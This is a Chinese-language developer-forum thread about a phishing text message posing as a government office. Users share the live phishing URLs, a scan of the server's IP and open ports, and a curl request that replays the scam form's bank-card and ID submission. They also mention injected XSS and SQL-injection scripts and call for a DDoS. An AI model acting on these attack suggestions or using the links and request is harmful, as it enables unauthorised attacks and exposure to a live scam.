刚收到条钓鱼短信,差点吃钩了

2022-08-02 15:29:34 +08:00
 storyxc

虽然短信被过滤了,但是看到这内容心里还是点进去了,还好看了下这网站域名发现不对劲,防不胜防啊

链接地址: http://m.bfnhu.me

11715 次点击
所在节点    程序员
82 条回复
ixinshang
2022-08-02 21:05:43 +08:00
跳转网易了。。
bavtoex
2022-08-02 22:11:03 +08:00
这里还有一个,也是今天收到的
gmq591386005
2022-08-02 23:23:57 +08:00
现在应该没有哪个部门叫卫生局吧?社保局或者人社局才对
Aloento
2022-08-02 23:41:44 +08:00
来个大佬送这个网站一点礼物
FirefoxChrome
2022-08-03 05:19:06 +08:00
ddos 大佬呢?网站还没挂!!!
melson
2022-08-03 07:34:07 +08:00
137.175.5.188
OS
Microsoft Windows Server 2012 R2
Network
PEGTECHINC (US)
Routing
137.175.0.0/17 via AS54600
Protocols
21/FTP , 80/HTTP , 888/HTTP , 3306/MYSQL , 3389/RDP , 8888/HTTP
fenglangjuxu
2022-08-03 09:14:38 +08:00
我一看域名 就不对 国家的哪有用这个后缀的
echoZero
2022-08-03 09:18:05 +08:00
mark ,晚上回去刚好实践一下 puppeteer
ruanimal
2022-08-03 09:52:59 +08:00
试试看图片

loca1h0st
2022-08-03 09:56:20 +08:00
这是哪位大佬插了一堆 xss 和 sql 注入脚本进后台。。。

http://8xafpe7apxgkzzhhxbnd.zoxm.beauty/log.htm
Zeonjl
2022-08-03 09:59:47 +08:00
之前也收到这个,单短信内容不是这个,打开后一样!伟大
jh352160
2022-08-03 10:52:02 +08:00
@hyshuang2006
没法过滤的,卫生局你过滤了,人家可以换卫生部,社保局,社会保障局,卫生管理局,公安局,甚至还能编出一堆不存在的部门,更不用提还可能出现的误杀关键短信的情况
zhangwugui
2022-08-03 10:54:05 +08:00
@ruanimal 你这个是怎么发的,我 PC 都没看到发图片的地方。。
bbmike253455
2022-08-03 11:25:20 +08:00
想知道,要是攻击这个服务器,要负法律责任吗
bbmike253455
2022-08-03 11:30:59 +08:00
要是 D 他,对方中途切了 DNS 到官网,这责任咋判
abcd191898105
2022-08-03 12:29:57 +08:00
我也有一次被一个类似的骗过了,回复 T 退订,立马开始钓鱼后续。我才发现不对劲,是钓鱼
abcd191898105
2022-08-03 12:31:22 +08:00
@fenglangjuxu me cf to ml 这种就是免费的垃圾域名,一看就知道了
wjfz
2022-08-03 12:47:06 +08:00
curl 'http://rtrbz2npyzab2dmi72gx.zoxm.beauty/subl.asp' \
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
-H 'Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,en;q=0.7' \
-H 'Cache-Control: no-cache' \
-H 'Connection: keep-alive' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'DNT: 1' \
-H 'Origin: http://rtrbz2npyzab2dmi72gx.zoxm.beauty' \
-H 'Pragma: no-cache' \
-H 'Referer: http://rtrbz2npyzab2dmi72gx.zoxm.beauty/account-loginb.asp' \
-H 'Upgrade-Insecure-Requests: 1' \
-H 'User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G955U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36' \
--data-raw 't2=132123&g_zhanghao=6212261111222233334&xmxm=%C0%EE%C0%F6&t4=230182198012251659&t5=18888888888&je=&klx=%B4%A2%D0%EE%BF%A8%D6%D0%B9%FA%B9%A4%C9%CC%D2%F8%D0%D0' \
--compressed \
--insecure

最终的提交数据请求
barrelsoil
2022-08-03 12:55:35 +08:00
我最近也收到过,域名类似 ***.sh 我还以为是上海的医保局,提醒说要更新医保卡,差点填银行卡号和密码啥的。

大家注意。
realpg
2022-08-03 13:20:10 +08:00
想多了, 就算真的你信息有问题,
根本不会给你提供这种便民服务....

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/870233

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX